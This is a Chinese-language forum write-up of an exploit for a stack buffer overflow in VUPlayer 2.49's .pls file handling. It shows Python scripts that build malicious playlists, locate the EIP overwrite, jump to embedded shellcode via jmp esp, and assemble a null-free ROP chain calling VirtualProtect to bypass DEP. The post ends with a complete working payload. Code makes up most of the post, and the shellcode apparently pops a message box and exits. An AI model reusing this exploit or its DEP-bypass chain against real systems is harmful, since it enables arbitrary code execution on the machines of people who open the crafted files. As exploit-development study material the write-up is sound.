-
-
[原创]VUPlayer 2.49 - '.pls' Stack Buffer Overflow (Bypass DEP)
-
2017-3-12 11:52 3767
-
漏洞:https://www.exploit-db.com/exploits/40172/
VUPlayer 2.49 - '.pls' Stack Buffer Overflow
环境:VirtualBox Win7企业版 + VUPlayer 2.49 + immunity debugger
软件运行。界面:
构造触发漏洞的文件
``` #!/usr/bin/python import struct exploit = "A"*2000 file = open('./exploit.pls','w') file.write(exploit) file.close() ```
播放exploit.pls,触发漏洞
定位覆盖eip的地址
``` #!/usr/bin/python import struct exploit = "A"*1012 + "a" * 1000 file = open('./exploit.pls','w') file.write(exploit) file.close() ```
触发漏洞函数,跟进去
``` 00455742 |. E8 59DBFFFF CALL VUPlayer.004532A0 ```
看到了strcpyA,直接将文件的内容复制到了局部变量中,栈溢出。
利用jmp esp跳到栈中去执行shellcode
``` import struct shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x68\x75\x7a\x8d\x14\x24\x51\x68\x73\x68\x75\x7a\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0"; jmp_esp = "\x9f\x53\x10\x10" exploit = "A"*1012 + jmp_esp + shellcode file = open('./exploit.pls','w') file.write(exploit) file.close() ```
栈地址执行成功........
接下来试试rop的方式,用mona寻找rop链。
目标:
``` Register setup for VirtualProtect() : -------------------------------------------- EAX = NOP (0x90909090) ECX = lpOldProtect (ptr to W address) EDX = NewProtect (0x40) EBX = dwSize ESP = lPAddress (automatic) EBP = ReturnTo (ptr to jmp esp) ESI = ptr to VirtualProtect() EDI = ROP NOP (RETN) ```
``` 0x004ffe6e, # POP ECX # RETN [VUPlayer.exe] 0x10109270, # ptr to &VirtualProtect() [IAT BASSWMA.dll] 0x004d7fe0, # MOV EAX,DWORD PTR DS:[ECX] # RETN [VUPlayer.exe] 0x10030950, # XCHG EAX,ESI # RETN [BASS.dll] 0x00442985, # POP EBP # RETN [VUPlayer.exe] 0x1010539f, # & jmp esp [BASSWMA.dll] 0x100110ff, # POP EBX # RETN [BASS.dll] 0x00000201, # 0x00000201-> ebx 0x1004041c, # POP EDX # RETN [BASS.dll] 0x00000040, # 0x00000040-> edx 0x004caccd, # POP ECX # RETN [VUPlayer.exe] 0x10108a2f, # &Writable location [BASSWMA.dll] 0x004ca628, # POP EDI # RETN [VUPlayer.exe] 0x1003a084, # RETN (ROP NOP) [BASS.dll] 0x10015f82, # POP EAX # RETN [BASS.dll] 0x90909090, # nop 0x1001d7a5, # PUSHAD # RETN [BASS.dll] ```
拷贝字符串触发的溢出,在exploit中不能有00,需要调整rop链,不能出现00
``` rop_chain = "\x04\xD8\x01\x10" # POP ESI # RETN rop_chain += "\x5c\xe2\x60\x10" #"\x70\x92\x10\x10" #ptr to &VirtualProtect() rop_chain += "\xAE\x2E\x10\x10" # MOV EAX,DWORD PTR DS:[ESI] # POP EBX # POP EDI # POP ESI # POP EBP # RETN 0x18 rop_chain += "\x90" * 16 rop_chain += "\x50\x09\x03\x10" # XCHG EAX,ESI # RETN [BASS.dll] rop_chain += "\x90" * 24 rop_chain += "\xAD\x59\x01\x10" # POP EBP # RETN 0x08 rop_chain += "\x9F\x53\x10\x10" # & jmp esp [BASSWMA.dll] rop_chain += "\x82\x5f\x01\x10" # POP EAX ret rop_chain += "\x90" * 8 rop_chain += "\xff\xfd\xff\xff" # 201 rop_chain += "\xb4\x4d\x01\x10" # NEG EAX # RETN rop_chain += "\x72\x2f\x03\x10" # XCHG EAX,EBX # RETN 0x00 201->ebx rop_chain += "\x82\x5f\x01\x10" # POP EAX ret rop_chain += "\xc0\xff\xff\xff" # 201 rop_chain += "\xb4\x4d\x01\x10" # NEG EAX # RETN rop_chain += "\x6d\x8a\x03\x10" # XCHG EAX,EDX # RETN rop_chain += "\x07\x10\x60\x10" # POP ECX # RETN rop_chain += "\x2f\x8a\x10\x10" # &Writable location [BASSWMA.dll] rop_chain += "\x18\x62\x01\x10" # POP EDI # RETN rop_chain += "\x84\xA0\x03\x10" # RETN [BASS.dll] rop_chain += "\x82\x5f\x01\x10" # POP EAX # RETN [BASS.dll] rop_chain += "\x90"*4 rop_chain += "\xA5\xD7\x01\x10" # PUSHAD # RETN ```
最后payload
``` #!/usr/bin/python import struct shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x68\x75\x7a\x8d\x14\x24\x51\x68\x73\x68\x75\x7a\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0"; rop_chain = "\x04\xD8\x01\x10" # POP ESI # RETN rop_chain += "\x5c\xe2\x60\x10" #"\x70\x92\x10\x10" #ptr to &VirtualProtect() rop_chain += "\xAE\x2E\x10\x10" # MOV EAX,DWORD PTR DS:[ESI] # POP EBX # POP EDI # POP ESI # POP EBP # RETN 0x18 rop_chain += "\x90" * 16 rop_chain += "\x50\x09\x03\x10" # XCHG EAX,ESI # RETN [BASS.dll] rop_chain += "\x90" * 24 rop_chain += "\xAD\x59\x01\x10" # POP EBP # RETN 0x08 rop_chain += "\x9F\x53\x10\x10" # & jmp esp [BASSWMA.dll] rop_chain += "\x82\x5f\x01\x10" # POP EAX ret rop_chain += "\x90" * 8 rop_chain += "\xff\xfd\xff\xff" # 201 rop_chain += "\xb4\x4d\x01\x10" # NEG EAX # RETN rop_chain += "\x72\x2f\x03\x10" # XCHG EAX,EBX # RETN 0x00 201->ebx rop_chain += "\x82\x5f\x01\x10" # POP EAX ret rop_chain += "\xc0\xff\xff\xff" # 201 rop_chain += "\xb4\x4d\x01\x10" # NEG EAX # RETN rop_chain += "\x6d\x8a\x03\x10" # XCHG EAX,EDX # RETN rop_chain += "\x07\x10\x60\x10" # POP ECX # RETN rop_chain += "\x2f\x8a\x10\x10" # &Writable location [BASSWMA.dll] rop_chain += "\x18\x62\x01\x10" # POP EDI # RETN rop_chain += "\x84\xA0\x03\x10" # RETN (ROP NOP) [BASS.dll] rop_chain += "\x82\x5f\x01\x10" # POP EAX # RETN [BASS.dll] rop_chain += "\x90"*4 rop_chain += "\xA5\xD7\x01\x10" exploit = "A"*1012 + rop_chain + shellcode file = open('./exploit.pls','w') file.write(exploit) file.close() ```
阿里云助力开发者!2核2G 3M带宽不限流量!6.18限时价,开 发者可享99元/年,续费同价!
赞赏
他的文章
看原图